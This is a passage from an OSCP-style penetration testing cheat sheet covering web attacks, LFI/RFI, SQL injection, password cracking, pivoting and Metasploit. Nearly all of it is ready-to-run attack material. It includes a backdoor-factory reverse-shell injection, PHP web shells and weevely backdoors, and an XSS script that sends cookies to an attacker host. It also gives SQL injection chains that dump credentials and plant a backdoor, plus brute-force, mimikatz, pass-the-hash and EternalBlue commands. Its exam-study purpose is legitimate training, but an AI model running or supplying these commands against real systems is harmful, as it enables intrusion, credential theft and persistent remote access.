1627. - Setting up the Client Side Exploit

1628.

1629. - Swapping Out the Shellcode

1630.

1631. - Injecting a Backdoor Shell into Plink.exe

1632. backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip

1633. -P 4444 -s reverse\_shell\_tcp

1634.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1635. - Web Attacks

1636. ---------------------------------------------------------------------------------------------------------
1637.

1638. - Web Shag Web Application Vulnerability Assessment Platform

1639. webshag-gui
1640.

1641. - Web Shells

1642. [*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells)

1643. ls -l /usr/share/webshells/

1644.
1645. - Generate a PHP backdoor (generate) protected with the given

1646. password (s3cr3t)

1647. weevely generate s3cr3t

1648. weevely http://$ip/weevely.php s3cr3t

1649.
1650. - Java Signed Applet Attack

1651.
1652. - HTTP / HTTPS Webserver Enumeration

1653.
1654. - OWASP Dirbuster

1655.

1656. - nikto -h $ip

1657.

1658. - Essential Iceweasel Add-ons

1659. Cookies Manager

1660. https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/

1661. Tamper Data

1662. https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1663.
1664. - Cross Site Scripting (XSS)

1665. significant impacts, such as cookie stealing and authentication

1666. bypass, redirecting the victim’s browser to a malicious HTML

1667. page, and more

1668.
1669. - Browser Redirection and IFRAME Injection

1670. <iframe SRC="http://$ip/report" height = "0" width

1671. ="0"></iframe>
1672.

1673. - Stealing Cookies and Session Information

1674. <script>

1675. new
1676. image().src="http://$ip/bogus.php?output="+document.cookie;

1677. </script>

1678. nc -nlvp 80
1679.

1680. - File Inclusion Vulnerabilities

1681. -----------------------------------------------------------------------------------------------------------------------------

1682.

1683. - Local (LFI) and remote (RFI) file inclusion vulnerabilities are
1684. commonly found in poorly written PHP code.

1685.
1686. - fimap - There is a Python tool called fimap which can be

1687. leveraged to automate the exploitation of LFI/RFI

1688. vulnerabilities that are found in PHP (sqlmap for LFI):

1689. [*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap)

1690.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1691. - Gaining a shell from phpinfo()

1692. fimap + phpinfo() Exploit - If a phpinfo() file is present,

1693. it’s usually possible to get a shell, if you don’t know the
1694. location of the phpinfo file fimap can probe for it, or you

1695. could use a tool like OWASP DirBuster.

1696.

1697. - For Local File Inclusions look for the include() function in PHP
1698. code.

1699. include("lang/".$\_COOKIE\['lang'\]);

1700. include($\_GET\['page'\].".php");
1701.

1702. - LFI - Encode and Decode a file using base64

1703. curl -s

1704. http://$ip/?page=php://filter/convert.base64-encode/resource=index

1705. | grep -e '\[^\\ \]\\{40,\\}' | base64 -d

1706.

1707. - LFI - Download file with base 64 encoding

1708. [*http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php*](about:blank)

1709.

1710. - LFI Linux Files:

1711. /etc/issue

1712. /proc/version
1713. /etc/profile

1714. /etc/passwd
1715. /etc/passwd

1716. /etc/shadow

1717. /root/.bash\_history
1718. /var/log/dmessage

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1719. /var/mail/root
1720. /var/spool/cron/crontabs/root

1721.

1722. - LFI Windows Files:

1723. %SYSTEMROOT%\\repair\\system

1724. %SYSTEMROOT%\\repair\\SAM
1725. %SYSTEMROOT%\\repair\\SAM

1726. %WINDIR%\\win.ini

1727. %SYSTEMDRIVE%\\boot.ini
1728. %WINDIR%\\Panther\\sysprep.inf

1729. %WINDIR%\\system32\\config\\AppEvent.Evt
1730.

1731. - LFI OSX Files:

1732. /etc/fstab
1733. /etc/master.passwd

1734. /etc/resolv.conf
1735. /etc/sudoers

1736. /etc/sysctl.conf
1737.

1738. - LFI - Download passwords file

1739. [*http://$ip/index.php?page=/etc/passwd*](about:blank)
1740. [*http://$ip/index.php?file=../../../../etc/passwd*](about:blank)

1741.
1742. - LFI - Download passwords file with filter evasion

1743. [*http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd*](about:blank)

1744.
1745. - Local File Inclusion - In versions of PHP below 5.3 we can

1746. terminate with null byte

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1747. GET

1748. /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00

1749.
1750. - Contaminating Log Files `<?php echo shell_exec($_GET['cmd']);?>`

1751.
1752. - For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini
1753. file must be configured to allow remote files

1754.
1755. */etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on"
1756.

1757. `include($_REQUEST["file"].".php");`
1758.
1759. - Remote File Inclusion

1760.
1761. `http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt `
1762.
1763. `<?php echo shell\_exec("ipconfig");?>`

1764.
1765. - Database Vulnerabilities
1766. ----------------------------------------------------------------------------------------------------------------------

1767.
1768. - Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and
password
1769.

1770. mysql -u root -p -h $ip

1771. use "Users"
1772. show tables;

1773. select \* from users;

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1774.
1775. - Authentication Bypass

1776.
1777. name='wronguser' or 1=1;
1778. name='wronguser' or 1=1 LIMIT 1;
1779.

1780. - Enumerating the Database

1781.
1782. `http://192.168.11.35/comment.php?id=738)'`

1783.
1784. Verbose error message?
1785.

1786. `http://$ip/comment.php?id=738 order by 1`

1787.
1788. `http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6 `
1789.

1790. Determine MySQL Version:

1791.
1792. `http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6 `

1793.
1794. Current user being used for the database connection:
1795.
1796. `http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6 `

1797.
1798. Enumerate database tables and column structures
1799.

1800. `http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables `

1801.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1802. Target the users table in the database

1803.
1804. `http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where
table_name='users' `
1805.

1806. Extract the name and password

1807.
1808. `http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users `

1809.
1810. Create a backdoor
1811.
1812. `http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE

'c:/xampp/htdocs/backdoor.php'`
1813.
1814.

1815. - SQLMap Examples

1816.
1817. - Crawl the links

1818.
1819. `sqlmap -u http://$ip --crawl=1`
1820.
1821. `sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`

1822.
1823.
1824. - SQLMap Search for databases against a suspected GET SQL Injection

1825.
1826. `sqlmap –u http://$ip/blog/index.php?search –dbs`
1827.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1828. - SQLMap dump tables from database oscommerce at GET SQL injection
1829.
1830. `sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps `
1831.

1832. - SQLMap GET Parameter command

1833.
1834. `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5 `

1835.
1836. - SQLMap Post Username parameter
1837.
1838. `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5

--dbms=MySQL --dump-all`
1839.
1840. - SQL Map OS Shell

1841.
1842. `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell `
1843.
1844. `sqlmap -u http://$ip/login.php --method=POST --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3 --level=5

--dbms=MySQL --os-shell`
1845.
1846. - Automated sqlmap scan

1847.
1848. `sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-
read="/var/www/blah.php"`

1849.
1850. - Targeted sqlmap scan
1851.
1852. `sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump`

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1853.
1854. - Scan url for union + error based injection with mysql backend and use a random user agent + database dump
1855.

1856. `sqlmap -o -u http://$ip/index.php --forms --dbs `

1857.
1858. `sqlmap -o -u "http://$ip/form/" --forms`

1859.
1860. - Sqlmap check form for injection
1861.
1862. `sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump`

1863.
1864. - Enumerate databases
1865.

1866. `sqlmap --dbms=mysql -u "$URL" --dbs`

1867.
1868. - Enumerate tables from a specific database
1869.

1870. `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables `

1871.
1872. - Dump table data from a specific database and table

1873.
1874. `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump `
1875.

1876. - Specify parameter to exploit

1877.
1878. `sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2 `
1879.

1880. - Specify parameter to exploit in 'nice' URIs (exploits param1)

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1881.
1882. `sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs `

1883.
1884. - Get OS shell
1885.

1886. `sqlmap --dbms=mysql -u "$URL" --os-shell`

1887.
1888. - Get SQL shell
1889.

1890. `sqlmap --dbms=mysql -u "$URL" --sql-shell`

1891.
1892. - SQL query

1893.
1894. `sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"`
1895.
1896. - Use Tor Socks5 proxy

1897.
1898. `sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs`
1899.

1900.
1901. - **NoSQLMap Examples**
1902. You may encounter NoSQL instances like MongoDB in your OSCP journies (`/cgi-bin/mongo/2.2.3/dbparse.py`). NoSQLMap can help
you to automate NoSQLDatabase enumeration.

1903.
1904. - NoSQLMap Installation
1905.

1906. git clone https://github.com/codingo/NoSQLMap.git

1907. cd NoSQLMap/

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1908. ls

1909. pip install couchdb

1910. pip install pbkdf2
1911. pip install ipcalc
1912. python nosqlmap.py --help

1913.
1914. - Password Attacks
1915. --------------------------------------------------------------------------------------------------------------

1916.
1917. - AES Decryption
1918. http://aesencryption.net/

1919.
1920. - Convert multiple webpages into a word list
1921. for x in 'index' 'about' 'post' 'contact' ; do curl
1922. http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >>

1923. webapp.txt ; done

1924.
1925. - Or convert html to word list dict

1926. html2dic index.html.out | sort -u > index-html.dict

1927.
1928. - Default Usernames and Passwords
1929.

1930. - CIRT
1931. [*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)
1932.

1933. - Government Security - Default Logins and Passwords for

1934. Networked Devices
1935.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1936. - [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*]
(http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php)
1937.
1938. - Virus.org

1939. [*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)
1940.
1941. - Default Password

1942. [*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)
1943.
1944. - Brute Force

1945.
1946. - Nmap Brute forcing Scripts
1947. [*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)
1948.

1949. - Nmap Generic auto detect brute force attack

1950. nmap --script brute -Pn <target.com or ip>
1951. <enter>

1952.
1953. - MySQL nmap brute force attack
1954. nmap --script=mysql-brute $ip
1955.

1956. - Dictionary Files

1957.
1958. - Word lists on Kali

1959. cd /usr/share/wordlists
1960.
1961. - Key-space Brute Force
1962.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1963. - crunch 6 6 0123456789ABCDEF -o crunch1.txt
1964.
1965. - crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha

1966.
1967. - crunch 8 8 -t ,@@^^%%%
1968.

1969. - Pwdump and Fgdump - Security Accounts Manager (SAM)

1970.
1971. - pwdump.exe - attempts to extract password hashes
1972.

1973. - fgdump.exe - attempts to kill local antiviruses before

1974. attempting to dump the password hashes and
1975. cached credentials.

1976.
1977. - Windows Credential Editor (WCE)
1978.

1979. - allows one to perform several attacks to obtain clear text

1980. passwords and hashes
1981.
1982. - wce -w

1983.
1984. - Mimikatz
1985.

1986. - extract plaintexts passwords, hash, PIN code and kerberos

1987. tickets from memory. mimikatz can also perform
1988. pass-the-hash, pass-the-ticket or build Golden tickets
1989. [*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz)

1990. From metasploit meterpreter (must have System level access):

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
1991. `meterpreter> load mimikatz
1992. meterpreter> help mimikatz

1993. meterpreter> msv

1994. meterpreter> kerberos
1995. meterpreter> mimikatz_command -f samdump::hashes

1996. meterpreter> mimikatz_command -f sekurlsa::searchPasswords`

1997.
1998. - Password Profiling
1999.

2000. - cewl can generate a password list from a web page

2001. `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`
2002.

2003. - Password Mutating

2004.
2005. - John the ripper can mutate password lists
2006. nano /etc/john/john.conf

2007. `john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`

2008.
2009. - Medusa

2010.
2011. - Medusa, initiated against an htaccess protected web
2012. directory

2013. `medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`

2014.
2015. - Ncrack
2016.

2017. - ncrack (from the makers of nmap) can brute force RDP
2018. `ncrack -vv --user offsec -P password-file.txt rdp://$ip`

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2019.

2020. - Hydra
2021.
2022. - Hydra brute force against SNMP

2023. `hydra -P password-file.txt -v $ip snmp`

2024.
2025. - Hydra FTP known user and password list
2026. `hydra -t 1 -l admin -P /root/Desktop/password.lst -vV $ip ftp`

2027.
2028. - Hydra SSH using list of users and passwords
2029. `hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh`

2030.
2031. - Hydra SSH using a known password and a username list
2032. `hydra -v -V -u -L users.txt -p "<known password>" -t 1 -u $ip ssh`
2033.

2034. - Hydra SSH Against Known username on port 22

2035. `hydra $ip -s 22 ssh -l <user> -P big\_wordlist.txt`
2036.

2037. - Hydra POP3 Brute Force

2038. `hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V`
2039.

2040. - Hydra SMTP Brute Force

2041. `hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V`
2042.
2043. - Hydra attack http get 401 login with a dictionary

2044. `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`

2045.
2046. - Hydra attack Windows Remote Desktop with rockyou

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2047. `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`
2048.
2049. - Hydra brute force a Wordpress admin login

2050. `hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log

In&testcookie=1:S=Location'`
2051.
2052.

2053.
2054. - Password Hash Attacks
2055. -------------------------------------------------------------------------------------------------------------------

2056.
2057. - Online Password Cracking
2058. [*https://crackstation.net/*](https://crackstation.net/)
2059.

2060. - Hashcat
2061. Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter.
2062. apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev

2063. and
2064. apt-get install pocl-opencl-icd
2065.
2066. Cracking Linux Hashes - /etc/shadow file

2067. ```
2068. 500 | md5crypt $1$, MD5(Unix) | Operating-Systems
2069. 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems

2070. 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems

2071. 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
2072. ```

2073. Cracking Windows Hashes

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2074. ```
2075. 3000 | LM | Operating-Systems
2076. 1000 | NTLM | Operating-Systems

2077. ```
2078. Cracking Common Application Hashes
2079. ```

2080. 900 | MD4 | Raw Hash

2081. 0 | MD5 | Raw Hash
2082. 5100 | Half MD5 | Raw Hash

2083. 100 | SHA1 | Raw Hash

2084. 10800 | SHA-384 | Raw Hash
2085. 1400 | SHA-256 | Raw Hash
2086. 1700 | SHA-512 | Raw Hash

2087. ```
2088.
2089. Create a .hash file with all the hashes you want to crack

2090. puthasheshere.hash:
2091. ```
2092. $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/
2093. ```

2094.
2095. Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:
2096.

2097. `hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt`

2098.
2099. Wordpress sample hash: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/

2100.
2101. Wordpress clear text: test

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2102.
2103. Hashcat example cracking Wordpress passwords using rockyou:

2104.
2105. `hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`
2106.

2107. - Sample Hashes

2108. [*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)
2109.
2110. - Identify Hashes

2111.
2112. `hash-identifier`
2113.

2114. - To crack linux hashes you must first unshadow them:

2115.
2116. `unshadow passwd-file.txt shadow-file.txt `

2117. `unshadow passwd-file.txt shadow-file.txt > unshadowed.txt`

2118.
2119. - John the Ripper - Password Hash Cracking
2120.

2121. - `john $ip.pwdump`

2122.
2123. - `john --wordlist=/usr/share/wordlists/rockyou.txt hashes`

2124.
2125. - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt`
2126.
2127. - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt`

2128.
2129. - JTR forced descrypt cracking with wordlist

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2130.

2131. `john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt`

2132.
2133. - JTR forced descrypt brute force cracking

2134.
2135. `john --format=descrypt hash --show`
2136.
2137. - Passing the Hash in Windows

2138.
2139. - Use Metasploit to exploit one of the SMB servers in the labs.
2140. Dump the password hashes and attempt a pass-the-hash attack

2141. against another system:

2142.
2143. `export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 `

2144.
2145. `pth-winexe -U administrator //$ip cmd`
2146.
2147. Networking, Pivoting and Tunneling

2148. ================================================================================================================================
2149.
2150. - Port Forwarding - accept traffic on a given IP address and port and

2151. redirect it to a different IP address and port

2152.
2153. - `apt-get install rinetd`
2154.

2155. - `cat /etc/rinetd.conf `

2156. `\# bindadress bindport connectaddress connectport `
2157. `w.x.y.z 53 a.b.c.d 80`

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2158.
2159. - SSH Local Port Forwarding: supports bi-directional communication
2160. channels

2161.
2162. - `ssh <gateway> -L <local port to listen>:<remote
2163. host>:<remote port>`
2164.

2165. - SSH Remote Port Forwarding: Suitable for popping a remote shell on
2166. an internal non routable network
2167.

2168. - `ssh <gateway> -R <remote port to bind>:<local

2169. host>:<local port>`
2170.
2171. - SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local

2172. attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
2173. network on ANY PORT
2174.

2175. - `ssh -D <local proxy port> -p <remote port>

2176. <target>`
2177.

2178. - Proxychains - Perform nmap scan within a DMZ from an external

2179. computer
2180.
2181. - Create reverse SSH tunnel from Popped machine on :2222

2182.
2183. `ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com`
2184. `ssh -f -N -R 2222:<local host>:22 root@<remote host>`

2185.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2186. - Create a Dynamic application-level port forward on 8080 thru
2187. 2222

2188.
2189. `ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>`
2190.
2191. - Leverage the SSH SOCKS server to perform Nmap scan on network

2192. using proxy chains

2193.
2194. `proxychains nmap --top-ports=20 -sT -Pn $ip/24`

2195.
2196. - HTTP Tunneling
2197.
2198. `nc -vvn $ip 8888`

2199.
2200. - Traffic Encapsulation - Bypassing deep packet inspection
2201.

2202. - http tunnel

2203. On server side:
2204. `sudo hts -F <server ip addr>:<port of your app> 80 `

2205. On client side:

2206. `sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel`
2207.
2208. - Tunnel Remote Desktop (RDP) from a Popped Windows machine to your

2209. network
2210.
2211. - Tunnel on port 22

2212.
2213. `plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>`

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2214.

2215. - Port 22 blocked? Try port 80? or 443?

2216.
2217. `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80`
2218.

2219. - Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel
2220. (bypass deep packet inspection)
2221.

2222. - Windows machine add required firewall rules without prompting the user
2223.
2224. - `netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes`
2225.

2226. - `netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000`
2227.
2228. - `netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080`

2229.
2230. - `netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079`
2231.
2232. - Start the http tunnel client

2233.
2234. `httptunnel_client.exe`
2235.

2236. - Create HTTP reverse shell by connecting to localhost port 3000

2237.
2238. `plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000`

2239.
2240. - VLAN Hopping
2241.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2242. - `git clone https://github.com/nccgroup/vlan-hopping.git

2243. chmod 700 frogger.sh

2244. ./frogger.sh`
2245.

2246.
2247. - VPN Hacking
2248.

2249. - Identify VPN servers:

2250. `./udp-protocol-scanner.pl -p ike $ip`
2251.
2252. - Scan a range for VPN servers:

2253. `./udp-protocol-scanner.pl -p ike -f ip.txt`

2254.
2255. - Use IKEForce to enumerate or dictionary attack VPN servers:

2256.
2257. `pip install pyip`
2258.
2259. `git clone https://github.com/SpiderLabs/ikeforce.git `

2260.
2261. Perform IKE VPN enumeration with IKEForce:
2262.

2263. `./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic `

2264.
2265. Bruteforce IKE VPN using IKEForce:

2266.
2267. `./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 `
2268. Use ike-scan to capture the PSK hash:
2269.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2270. `ike-scan
2271. ike-scan TARGET-IP
2272. ike-scan -A TARGET-IP

2273. ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key

2274. ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP `
2275. Use psk-crack to crack the PSK hash
2276.

2277. `psk-crack hash-file.txt

2278. pskcrack
2279. psk-crack -b 5 TARGET-IPkey

2280. psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key

2281. psk-crack -d /path/to/dictionary-file TARGET-IP-key`
2282.

2283. - PPTP Hacking

2284.
2285. - Identifying PPTP, it listens on TCP: 1723
2286. NMAP PPTP Fingerprint:

2287.
2288. `nmap –Pn -sV -p 1723 TARGET(S) `
2289. PPTP Dictionary Attack

2290.
2291. `thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst`
2292.
2293. - Port Forwarding/Redirection

2294.
2295. - PuTTY Link tunnel - SSH Tunneling
2296.

2297. - Forward remote port to local address:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2298.
2299. `plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>`

2300.
2301. - SSH Pivoting
2302.
2303. - SSH pivoting from one network to another:

2304.
2305. `ssh -D <local host>:1010 -p 22 user@<remote host>`
2306.

2307. - DNS Tunneling

2308.
2309. - dnscat2 supports “download” and “upload” commands for getting iles (data and programs) to and from the target machine.

2310.
2311. - Attacking Machine Installation:
2312.
2313. `apt-get update

2314. apt-get -y install ruby-dev git make g++

2315. gem install bundler
2316. git clone https://github.com/iagox86/dnscat2.git

2317. cd dnscat2/server
2318. bundle install`
2319.
2320. - Run dnscat2:

2321.
2322. `ruby ./dnscat2.rb
2323. dnscat2> New session established: 1422

2324. dnscat2> session -i 1422`

2325.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2326. - Target Machine:

2327. https://downloads.skullsecurity.org/dnscat2/
2328. https://github.com/lukebaggett/dnscat2-powershell/
2329.
2330. `dnscat --host <dnscat server ip>`

2331.
2332. The Metasploit Framework
2333. ======================================================================================================================

2334.
2335. - See [*Metasploit Unleashed
2336. Course*](https://www.offensive-security.com/metasploit-unleashed/)
2337. in the Essentials

2338.
2339. - Search for exploits using Metasploit GitHub framework source code:
2340. [*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)

2341. Translate them for use on OSCP LAB or EXAM.

2342.
2343. - Metasploit

2344.
2345. - MetaSploit requires Postfresql
2346.
2347. `systemctl start postgresql`

2348.
2349. - To enable Postgresql on startup
2350.

2351. `systemctl enable postgresql`

2352.
2353. - MSF Syntax

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2354.
2355. - Start metasploit
2356.
2357. `msfconsole `

2358.
2359. `msfconsole -q`
2360.

2361. - Show help for command

2362.
2363. `show -h`
2364.

2365. - Show Auxiliary modules

2366.
2367. `show auxiliary`

2368.
2369. - Use a module
2370.

2371. `use auxiliary/scanner/snmp/snmp_enum

2372. use auxiliary/scanner/http/webdav_scanner
2373. use auxiliary/scanner/smb/smb_version
2374. use auxiliary/scanner/ftp/ftp_login

2375. use exploit/windows/pop3/seattlelab_pass`

2376.
2377. - Show the basic information for a module

2378.
2379. `info`
2380.
2381. - Show the configuration parameters for a module

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2382.
2383. `show options`
2384.

2385. - Set options for a module

2386.
2387. `set RHOSTS 192.168.1.1-254

2388. set THREADS 10`

2389.
2390. - Run the module
2391.

2392. `run`
2393.
2394. - Execute an Exploit

2395.
2396. `exploit`
2397.
2398. - Search for a module

2399.
2400. `search type:auxiliary login`
2401.

2402. - Metasploit Database Access

2403.
2404. - Show all hosts discovered in the MSF database

2405.
2406. `hosts`
2407.
2408. - Scan for hosts and store them in the MSF database

2409.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2410. `db_nmap`
2411.

2412. - Search machines for specific ports in MSF database

2413.
2414. `services -p 443`

2415.
2416. - Leverage MSF database to scan SMB ports (auto-completed rhosts)
2417.
2418. `services -p 443 --rhosts`

2419.
2420. - Staged and Non-staged
2421.

2422. - Non-staged payload - is a payload that is sent in its entirety in one go

2423.
2424. - Staged - sent in two parts Not have enough buffer space Or need to bypass antivirus
2425.

2426. - MS 17-010 - EternalBlue

2427.
2428. - You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended

course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in
Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install
it taken from the following YouTube video:

2429. https://www.youtube.com/watch?v=4OHLor9VaRI
2430.
2431.
2432. 1. First step is to configure the Kali to work with wine 32bit

2433.
2434. `dpkg --add-architecture i386 && apt-get update && apt-get install wine32

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2435. rm -r ~/.wine

2436. wine cmd.exe

2437. exit`
2438.
2439. 2. Download the exploit repostory

2440. https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
2441.
2442. 3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb

2443.
2444. 4. Start metasploit console
2445.

2446.
2447. I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.
2448.
2449.

2450. `use exploit/windows/smb/eternalblue_doublepulsar

2451. msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
2452. RHOST => 10.11.1.73

2453. msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe

2454. PROCESSINJECT => spoolsv.exe
2455. msf exploit(eternalblue_doublepulsar) > run`
2456.

2457.
2458.
2459. - Experimenting with Meterpreter

2460.
2461. - Get system information from Meterpreter Shell
2462.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
2463. `sysinfo`
2464.
2465. - Get user id from Meterpreter Shell
2466.

2467. `getuid`
2468.
2469. - Search for a file

2470.
2471. `search -f *pass*.txt`
2472.

2473. - Upload a file

2474.
2475. `upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`
2476.

2477. - Download a file

2478.
2479. `download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`

2480.
2481. - Invoke a command shell from Meterpreter Shell
2482.
2483. `shell`

2484.
2485. - Exit the meterpreter shell
2486.

2487. `exit`
2488.
